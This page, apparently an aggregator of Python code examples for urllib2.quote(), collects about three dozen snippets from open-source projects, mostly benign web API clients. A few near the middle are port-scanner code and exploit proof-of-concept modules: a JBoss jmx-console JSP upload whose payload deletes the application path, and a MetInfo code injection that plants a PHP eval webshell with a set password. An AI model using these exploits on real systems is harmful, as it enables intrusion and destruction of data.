我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用urllib2.quote()。
def retrieve_json(self,url): ''' Retrieve data from the Veneer service at the given url path. url: Path to required resource, relative to the root of the Veneer service. ''' if PRINT_URLS: print("*** %s ***" % (url)) if self.protocol=='file': text = open(self.prefix+url+self.data_ext).read() else: conn = hc.HTTPConnection(self.host,port=self.port) conn.request('GET',quote(url+self.data_ext)) resp = conn.getresponse() text = resp.read().decode('utf-8') #text = urlopen(self.base_url + quote(url+self.data_ext)).read().decode('utf-8') text = self._replace_inf(text) if PRINT_ALL: print(json.loads(text)) print("") return json.loads(text)
def retrieve_csv(self,url): ''' Retrieve data from the Veneer service, at the given url path, in CSV format. url: Path to required resource, relative to the root of the Veneer service. NOTE: CSV responses are currently only available for time series results ''' if PRINT_URLS: print("*** %s ***" % (url)) req = Request(self.base_url + quote(url+self.data_ext),headers={"Accept":"text/csv"}) text = urlopen(req).read().decode('utf-8') result = utils.read_veneer_csv(text) if PRINT_ALL: print(result) print("") return result
def retrieve_json(self,url,**kwargs): if self.print_urls: print("*** %s ***" % (url)) try: text = urlopen(self.base_url + quote(url)).read().decode('utf-8') except: self.log("Couldn't retrieve %s"%url) return None self.save_data(url[1:],bytes(text,'utf-8'),"json") if self.print_all: print(json.loads(text)) print("") return json.loads(text)
def get_user(self): token = self.accessToken() if not token: return None uinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo?access_token=%s' % urllib2.quote(token, safe='') uinfo = None try: uinfo_stream = urllib2.urlopen(uinfo_url) except: session.token = None return data = uinfo_stream.read() uinfo = json.loads(data) username = uinfo['id'] return dict(first_name = uinfo['given_name'], last_name = uinfo['family_name'], username = username, email = uinfo['email'])
def cui_to_uri(api_key, cui): """ Function to map from cui to uri if possible. Uses biontology portal Input: - api_key: str, api usage key change it in setting.yaml - cui: str, cui of the entity we wish to map the uri Output: - the uri found in string format or None """ REST_URL = "http://data.bioontology.org" annotations = get_json_with_api(api_key, REST_URL + "/search?include_properties=true&q=" + urllib2.quote(cui)) try: return annotations['collection'][0]['@id'] except Exception, e: time_log(Exception) time_log(e) return None
def cui_to_uri(api_key, cui): """ Function to map from cui to uri if possible. Uses biontology portal Input: - api_key: str, api usage key change it in setting.yaml - cui: str, cui of the entity we wish to map the uri Output: - the uri found in string format or None """ REST_URL = "http://data.bioontology.org" annotations = get_json_with_api(api_key, REST_URL + "/search?include_properties=true&q=" + urllib2.quote(cui)) try: return annotations['collection'][0]['@id'] except Exception,e: print Exception print e return None
def edsm_worker(systemName): if not this.edsm_session: this.edsm_session = requests.Session() try: r = this.edsm_session.get('https://www.edsm.net/api-system-v1/bodies?systemName=%s' % urllib2.quote(systemName), timeout=10) r.raise_for_status() this.edsm_data = r.json() or {} # Unknown system represented as empty list except: this.edsm_data = None # Tk is not thread-safe, so can't access widgets in this thread. # event_generate() is the only safe way to poke the main thread from this thread. this.frame.event_generate('<<HabZoneData>>', when='tail') # EDSM data received
def edsm_data(event): if this.edsm_data is None: # error for (label, edsm, near, dash, far, ls) in this.worlds: edsm['text'] = '?' edsm['url'] = None return # Collate bodies = defaultdict(list) for body in this.edsm_data.get('bodies', []): if body.get('terraformingState') == 'Candidate for terraforming': bodies['terraformable'].append(body['name']) else: bodies[body['subType']].append(body['name']) # Display systemName = this.edsm_data.get('name', '') url = 'https://www.edsm.net/show-system?systemName=%s&bodyName=ALL' % urllib2.quote(systemName) for i in range(len(WORLDS)): (name, high, low, subType) = WORLDS[i] (label, edsm, near, dash, far, ls) = this.worlds[i] edsm['text'] = ' '.join([x[len(systemName):].replace(' ', '') if x.startswith(systemName) else x for x in bodies[subType]]) edsm['url'] = len(bodies[subType]) == 1 and 'https://www.edsm.net/show-system?systemName=%s&bodyName=%s' % (urllib2.quote(systemName), urllib2.quote(bodies[subType][0])) or url
def encode_params(self, base_url, method, params): params = params.copy() if self.token: params['oauth_token'] = self.token params['oauth_consumer_key'] = self.consumer_key params['oauth_signature_method'] = 'HMAC-SHA1' params['oauth_version'] = '1.0' params['oauth_timestamp'] = str(int(time())) params['oauth_nonce'] = str(getrandbits(64)) enc_params = urlencode_noplus(sorted(params.items())) key = self.consumer_secret + "&" + urllib_parse.quote(self.token_secret, safe='~') message = '&'.join( urllib_parse.quote(i, safe='~') for i in [method.upper(), base_url, enc_params]) signature = (base64.b64encode(hmac.new( key.encode('ascii'), message.encode('ascii'), hashlib.sha1) .digest())) return enc_params + "&" + "oauth_signature=" + urllib_parse.quote(signature, safe='~')
def __call__(self, twitter, options): # We need to be pointing at search.twitter.com to work, and it is less # tangly to do it here than in the main() twitter.domain = "search.twitter.com" twitter.uriparts = () # We need to bypass the TwitterCall parameter encoding, so we # don't encode the plus sign, so we have to encode it ourselves query_string = "+".join( [quote(term) for term in options['extra_args']]) results = twitter.search(q=query_string)['results'] f = get_formatter('search', options) for result in results: resultStr = f(result, options) if resultStr.strip(): printNicely(resultStr)
def get_user(self): token = self.accessToken() if not token: return None uinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo?access_token=%s' % urllib2.quote(token, safe='') uinfo = None try: uinfo_stream = urllib2.urlopen(uinfo_url) except: session.token = None return data = uinfo_stream.read() pic = "http://picasaweb.google.com/data/entry/api/user/ uinfo['id'] ?alt=json" uinfo = json.loads(data) return dict(first_name=uinfo['given_name'], last_name=uinfo['family_name'], username=uinfo['id'], email=uinfo['email'], pic=pic)
def downloadSingleType(bigCate,smallCate,baseDir): """ ?????????????????????????????????????????? :param bigCate: ???? :param smallCate: ???? :param baseDir: ???? :return: None """ global smallCateURL, downloadDir, queue, logFile smallCateURL = 'http://dict.qq.pinyin.cn/dict_list?sort1=%s&sort2=%s' %(urllib2.quote(bigCate), urllib2.quote(smallCate)) # url?? if baseDir[-1] == '/': print '?? '+baseDir+' ?????/' return downloadDir = baseDir+'/'+bigCate+'/'+smallCate logFile = baseDir+'/download.log' if not os.path.exists(downloadDir.decode('utf8')): # ???????????? os.makedirs(downloadDir.decode('utf8')) queue.put(smallCateURL)
def wiki_bio_download (list_file_name, out_dir): for name in codecs.open(list_file_name, 'r', "utf-8"): name=name.rstrip('\n') if not os.path.exists(out_dir): os.makedirs(out_dir) if not os.path.exists(out_dir+os.sep+name+".html"): url="https://en.wikipedia.org/wiki/"+name sys.stdout.write(" Downloading "+name.encode('utf8')+"\n") url = urllib2.quote(url.encode('utf8'), ':/') response = urllib2.urlopen(url) html = response.read() html = html.decode('utf8') outname = out_dir+os.sep+name+".html" html_out = codecs.open(outname, 'w', "utf-8") html_out.write(html) sys.stdout.write("All files downloaded\n")
def upload_to(host, filename, port=7777): """ Simple method to upload a file into NGAS """ with contextlib.closing(httplib.HTTPConnection(host, port)) as conn: conn.putrequest('POST', '/QARCHIVE?filename=%s' % (urllib2.quote(os.path.basename(filename)),) ) conn.putheader('Content-Length', os.stat(filename).st_size) conn.endheaders() with open(filename) as f: for data in iter(functools.partial(f.read, 4096), ''): conn.send(data) r = conn.getresponse() if r.status != httplib.OK: raise Exception("Error while QARCHIVE-ing %s to %s:%d:\nStatus: %d\n%s\n\n%s" % (filename, conn.host, conn.port, r.status, r.msg, r.read())) else: success("{0} successfully archived to {1}!".format(filename, host))
def getPushURL(hostId, gateway = None): """ Construct the push url based on the hostId in the cluster hostId: the host (e.g. 192.168.1.1:7777) that will receive the file gateway: a list of gateway hosts separated by comma The sequence of this list is from target to source e.g. if the dataflow is like: source --> A --> B --> C --> target then, the gateway list should be ordered as: C,B,A """ if (gateway): gateways = gateway.split(',') gurl = 'http://%s/QARCHIVE' % hostId for gw in gateways: gurl = 'http://%s/PARCHIVE?nexturl=%s' % (gw, urllib2.quote(gurl)) #return 'http://%s/PARCHIVE?nexturl=http://%s/QAPLUS' % (gateway, hostId) return gurl else: return 'http://%s/QARCHIVE' % hostId
def getPushURL(hostId, gateway = None): """ Construct the push url based on the hostId in the cluster hostId: the host (e.g. 192.168.1.1:7777) that will receive the file gateway: a list of gateway hosts separated by comma The sequence of this list is from target to source e.g. if the dataflow is like: source --> A --> B --> C --> target then, the gateway list should be ordered as: C,B,A """ if (gateway): gateways = gateway.split(',') gurl = 'http://%s/QAPLUS' % hostId for gw in gateways: gurl = 'http://%s/PARCHIVE?nexturl=%s' % (gw, urllib2.quote(gurl)) #return 'http://%s/PARCHIVE?nexturl=http://%s/QAPLUS' % (gateway, hostId) return gurl else: return 'http://%s/QAPLUS' % hostId
def _get_proxy_info(context): if not context.get('proxy_hostname') or not context.get('proxy_port'): return None user_pass = '' if context.get('proxy_username') and context.get('proxy_password'): username = urllib2.quote(context['proxy_username'], safe='') password = urllib2.quote(context['proxy_password'], safe='') user_pass = '{user}:{password}@'.format( user=username, password=password) proxy = 'http://{user_pass}{host}:{port}'.format( user_pass=user_pass, host=context['proxy_hostname'], port=context['proxy_port']) proxies = { 'http': proxy, 'https': proxy, } return proxies
def query(self, query, num_results=30): query = urllib2.quote(self.preprocess(query)) p = 0 next_url = self.base_url.replace("{query}", query).replace("{page}", str(p)) all_images = [] for i in range(0, num_results, self.max_number_per_req): page = html.fromstring(self.opener.open(next_url).read()) elements = page.find_class('serp-list') e = elements[0].getchildren() images = [json.loads(el.get('data-bem'))['serp-item'] for el in e] for image in images: all_images.append({'image_id': image['id'], 'url': image['img_href']}) p += 1 next_url = self.base_url.replace("{query}", query).replace("{page}", str(p)) time.sleep(0.25) return all_images[:num_results]
def run(self): while True: try: if queue.empty():break queue_task = self.queue.get() except: break try: task_host,task_port = queue_task.split(":") data = scan_port(task_host,task_port) if data: if data <> 'NULL': port_data[task_host + ":" + task_port] = urllib2.quote(data) #print task_host,task_port,' '.join(['0x%2x' % ord(x) for x in data]) server_type = server_discern(task_host,task_port,data) if not server_type: h_server,title = get_web_info(task_host,task_port) #print h_server,title if title or h_server:server_type = 'web ' + title if server_type:log('server',task_host,task_port,server_type.strip()) except Exception,e: continue
def get_web_info(host,port): h_server,h_xpb,title_str,html = '','','','' try: info = urllib2.urlopen("http://%s:%s"%(host,port),timeout=timeout) html = info.read() header = info.headers except urllib2.HTTPError,e: header = e.headers except Exception,e: return False,False if not header:return False,False try: port_data[host + ":" + str(port)] = urllib2.quote(str(header) + "\r\n\r\n" + cgi.escape(html)) #if header.has_key('Server'):h_server=header['Server'] #if header.has_key('X-Powered-By'):h_xpb = header['X-Powered-By'] title = re.search(r'<title>(.*)</title>', html, flags=re.I) if title:title_str=title.group(1) except Exception,e: pass return str(header),title_str
def run(self): while True: try: if queue.empty():break queue_task = self.queue.get() except: break try: task_host,task_port = queue_task.split(":") data = scan_port(task_host,task_port) if data: if data <> 'NULL': port_data[task_host + ":" + task_port] = urllib2.quote(data) server_type = server_discern(task_host,task_port,data) if not server_type: h_server,title = get_web_info(task_host,task_port) if title or h_server:server_type = 'web ' + title if server_type:log('server',task_host,task_port,server_type.strip()) except Exception,e: continue
def get_web_info(host,port): h_server,h_xpb,title_str,html = '','','','' try: info = urllib2.urlopen("http://%s:%s"%(host,port),timeout=timeout) html = info.read() header = info.headers except urllib2.HTTPError,e: header = e.headers except Exception,e: return False,False if not header:return False,False try: html_code = get_code(header,html).strip() if html_code and len(html_code) < 12: html = html.decode(html_code).encode('utf-8') except: pass try: port_data[host + ":" + str(port)] = urllib2.quote(str(header) + "\r\n\r\n" + cgi.escape(html)) title = re.search(r'<title>(.*?)</title>', html, flags=re.I|re.M) if title:title_str=title.group(1) except Exception,e: pass return str(header),title_str
def verify(cls, args): verify_code = ('\n<%@ page import="java.util.*,java.io.*" %>\n<%@ page import="' 'java.io.*"%>\n<%\nString path=request.getRealPath("");\nout.prin' 'tln(path);\nFile d=new File(path);\nif(d.exists()){\n d.delete()' ';\n }\n%>\n<% out.println("this_is_not_exist_9.1314923");%>') payload = ('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor' 'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True') verify_data = payload % urllib2.quote(verify_code) verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor' if args['options']['verbose']: print '[*] Request URL: ' + verify_url page_content = '' request = urllib2.Request(verify_url, verify_data) response = urllib2.urlopen(request) page_content = response.read() if 'this_is_not_exist_9.1314923' in page_content: args['success'] = True args['poc_ret']['vul_url'] = verify_url return args
def __str_quote(string): if type(string).__name__ == "str": try: string = unicode(string, encoding='utf-8', errors='xmlcharrefreplace') except TypeError: string = unicode(string, encoding='utf-8', errors='ignore') elif type(string).__name__ == "unicode": try: string = string.encode(encoding='utf-8', errors='xmlcharrefreplace') except UnicodeEncodeError: string = string.encode(encoding='utf-8', errors='ignore') string = pattern.sub(lambda m: rep[re.escape(m.group(0))], string) try: return quote(string, safe='') except KeyError: print "QUOTE FAIL" print type(string).__name__ print string exit()
def updateUI(event = None): eliteSystem = this.lastEventInfo.get(BG_SYSTEM, None) message = this.lastEventInfo.get(BG_MESSAGE, None) if (this.enabled or this.overwrite.get()) and eliteSystem: this.errorLabel.grid_remove() this.unconfirmedSystem.grid(row=0, column=1, sticky=tk.W) this.unconfirmedSystem["text"] = eliteSystem.name this.unconfirmedSystem["url"] = "https://www.edsm.net/show-system?systemName={}".format(urllib2.quote(eliteSystem.name)) this.unconfirmedSystem["state"] = "enabled" this.distanceValue["text"] = u"{distance} Ly (\u00B1{uncertainty})".format(distance=Locale.stringFromNumber(eliteSystem.distance, 2), uncertainty=eliteSystem.getUncertainty() or "?") if this.clipboard.get(): this.frame.clipboard_clear() this.frame.clipboard_append(eliteSystem.name) else: this.unconfirmedSystem.grid_remove() this.errorLabel.grid(row=0, column=1, sticky=tk.W) this.distanceValue["text"] = "?" if not this.enabled and not this.overwrite.get(): this.errorLabel["text"] = "EDSM/EDDN is disabled" else: this.errorLabel["text"] = message or "?"
def run(self, lines): HEADER_REGEX = re.compile('\]\(#([^\)]+)\)') # maybe too much sensitive def uriquote(m): value = m.groups()[0] value = value.encode("utf-8", "ignore") value = urllib2.quote(value) return '](#%s)' % value new_lines = [] for line in lines: if HEADER_REGEX.search(line): line = HEADER_REGEX.sub(uriquote, line) new_lines.append(line) return new_lines
def verify(cls, args): url = args['options']['target'] payload = 'echo md5("beebeeto");//' name = os.urandom(3).encode('hex') shell_url = '%s/cache/langadmin_%s.php' % (url, name) verify_url = ( '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m' 'et_langadmin[%s][]=12345&str=%s' % (url, name, name, urllib2.quote(payload)) ) if args['options']['verbose']: print '[*] Request URL: ' + verify_url requests.get(verify_url) if args['options']['verbose']: print '[*] Request SHELL: ' + verify_url content = requests.get(shell_url).content if '595bb9ce8726b4b55f538d3ca0ddfd76' in content: args['success'] = True args['poc_ret']['vul_url'] = verify_url args['poc_ret']['test_shell'] = shell_url return args
def exploit(cls, args): url = args['options']['target'] payload = 'echo md5("beebeeto");@eval($_POST["bb2"]);//' name = os.urandom(3).encode('hex') shell_url = '%s/cache/langadmin_%s.php' % (url, name) verify_url = ( '%s/admin/include/common.inc.php?met_admin_type_ok=1&langset=%s&m' 'et_langadmin[%s][]=12345&str=%s' % (url, name, name, urllib2.quote(payload)) ) if args['options']['verbose']: print '[*] Request URL: ' + verify_url requests.get(verify_url) if args['options']['verbose']: print '[*] Request SHELL: ' + verify_url content = requests.get(shell_url).content if '595bb9ce8726b4b55f538d3ca0ddfd76' in content: args['success'] = True args['poc_ret']['vul_url'] = verify_url args['poc_ret']['webshell'] = shell_url args['poc_ret']['password'] = 'bb2' return args
def word_seg_get(data): output = get_page(get_addres + urllib2.quote(data.encode("utf-8"))) if not 'SegmentResult' in output: return {} result = {} output = output.decode("gbk").encode("utf-8") #print output #print data.encode("utf-8") #output = output.translate(string.maketrans('\n',' ')) info_dict = json.loads(output) segment = [] if 'SegmentResult' in info_dict: for i in range(0, len(info_dict['SegmentResult'])): if info_dict['SegmentResult'][i] and 'buffer' in info_dict['SegmentResult'][i]: segment.append(info_dict['SegmentResult'][i]['buffer']) #print info_dict['SegmentResult'][i]['buffer'].encode('utf-8') basic = [] if 'BasicWordResult' in info_dict: for i in range(0, len(info_dict['BasicWordResult'])): if info_dict['BasicWordResult'][i] and 'buffer' in info_dict['BasicWordResult'][i]: basic.append(info_dict['BasicWordResult'][i]['buffer']) #print info_dict['SegmentResult'][i]['buffer'].encode('utf-8') result["segment"] = segment result["basic"] = basic return result
def word_seg_get(data): output = get_page(get_addres + urllib2.quote(data.encode("utf-8"))) if not 'SegmentResult' in output: return {} result = {} output = output.decode("gbk").encode("utf-8") #print output output = output.translate(string.maketrans('\n',' ')) info_dict = json.loads(output) segment = [] if 'SegmentResult' in info_dict: for i in range(0, len(info_dict['SegmentResult'])): if info_dict['SegmentResult'][i] and 'buffer' in info_dict['SegmentResult'][i]: segment.append(info_dict['SegmentResult'][i]['buffer']) #print info_dict['SegmentResult'][i]['buffer'].encode('utf-8') basic = [] if 'BasicWordResult' in info_dict: for i in range(0, len(info_dict['BasicWordResult'])): if info_dict['BasicWordResult'][i] and 'buffer' in info_dict['BasicWordResult'][i]: basic.append(info_dict['BasicWordResult'][i]['buffer']) #print info_dict['SegmentResult'][i]['buffer'].encode('utf-8') result["segment"] = segment result["basic"] = basic return result
def getComputerId(computerSearch, username, password): computerSearch_normalized = urllib2.quote(computerSearch) reqStr = jss_api_base_url + '/computers/match/' + computerSearch_normalized r = sendAPIRequest(reqStr, username, password, 'GET') if r == -1: return -1 #responseCode = r.code baseXml = r.read() #print baseXml responseXml = etree.fromstring(baseXml) response_size = responseXml.find('size').text if response_size == '0': #print 'Mobile Device not found, please search again.' return -1 elif response_size == '1': return responseXml.find('computer/id').text else: #print 'Too many results, narrow your search paramaters.' return -2
def getMobileDeviceId(mobileDeviceName, username, password): mobileDeviceName_normalized = urllib2.quote(mobileDeviceName) reqStr = jss_api_base_url + '/mobiledevices/match/' + mobileDeviceName_normalized r = sendAPIRequest(reqStr, username, password, 'GET') if r == -1: return -1 #responseCode = r.code baseXml = r.read() #print baseXml responseXml = etree.fromstring(baseXml) response_size = responseXml.find('size').text if response_size == '0': #print 'Mobile Device not found, please search again.' return -1 elif response_size == '1': return responseXml.find('mobile_device/id').text else: #print 'Too many results, narrow your search paramaters.' return -2
def updateMobileDeviceName(mobileSearch, deviceName, username, password): print 'Updating Mobile Device name for mobile device ' + mobileSearch + ' to ' + deviceName + '...' newDeviceName_normalized = urllib2.quote(deviceName) mobile_id = getSupervisedMobileDeviceId(mobileSearch, username, password) if str(mobile_id) == '-1': print 'Mobile device ' + mobileSearch + ' not found, please try again.' return -1 elif str(mobile_id) == '-2': print 'More than one mobile device matching search string ' + str(mobileSearch) + ', please try again.' return -1 elif str(mobile_id) == '-3': print 'Device found, but is not supervised.' postStr = jss_api_base_url + '/mobiledevicecommands/command/DeviceName/' + newDeviceName_normalized + '/id/' + mobile_id postXML = "<mobile_device_command><command>DeviceName</command><mobile_devices><mobile_device><id>" + mobile_id + "</id><device_name>" + deviceName + "</device_name></mobile_device></mobile_devices></mobile_device_command>"
def getComputerGroupId(groupSearch, username, password): groupSearch_normalized = urllib2.quote(groupSearch) reqStr = jss_api_base_url + '/computergroups/name/' + groupSearch_normalized r = sendAPIRequest(reqStr, username, password, 'GET') if r != -1: responseCode = r.code #print 'Response Code: ' + str(responseCode) baseXml = r.read() responseXml = etree.fromstring(baseXml) computerGroupId = responseXml.find('id').text #print computerGroupId return computerGroupId else: #print 'Group not found.' return -1
def rawGeocoder(self, query): # http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2 add = query + ", Argentina" add = urllib2.quote(add.encode('utf8')) geocode_url = "http://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % add req = urllib2.urlopen(geocode_url) res = json.loads(req.read()) # comprehension para parsear lo devuelto por el google geocoder ret = [ { 'nombre' : i["formatted_address"], 'precision': len(i["address_components"]) / 6, 'geom' : "POINT(" + str(i["geometry"]["location"]["lng"]) + " " + str(i["geometry"]["location"]["lat"]) + ")", 'tipo' : "rawGeocoder" } for i in res["results"] ] return ret
def direccionPostal(self, calle, numero, ciudad_slug): # http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2 import urllib2 import json add = calle + " " + numero + ", " + ciudad_slug + ", Argentina" add = urllib2.quote(add.encode('utf8')) geocode_url = "http://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % add req = urllib2.urlopen(geocode_url) res = json.loads(req.read()) # comprehension para parsear lo devuelto por el google geocoder ret = [ { 'nombre' : i["formatted_address"], 'precision': 1, 'geom' : "POINT(" + str(i["geometry"]["location"]["lng"]) + " " + str(i["geometry"]["location"]["lat"]) + ")", 'tipo' : "direccionPostal" } for i in res["results"] if "street_address" in i["types"] ] return ret
def get_trackid_from_text_search(title,artistname=''): """ Search for an artist + title using 7digital search API Return None if there is a problem, or tuple (title,trackid) """ url = 'http://api.7digital.com/1.2/track/search?' url += 'oauth_consumer_key='+DIGITAL7_API_KEY query = title if artistname != '': query = artistname + ' ' + query query = urllib2.quote(query) url += '&q='+query xmldoc = url_call(url) status = xmldoc.getAttribute('status') if status != 'ok': return None resultelem = xmldoc.getElementsByTagName('searchResult') if len(resultelem) == 0: return None track = resultelem[0].getElementsByTagName('track')[0] tracktitle = track.getElementsByTagName('title')[0].firstChild.data trackid = int(track.getAttribute('id')) return (tracktitle,trackid)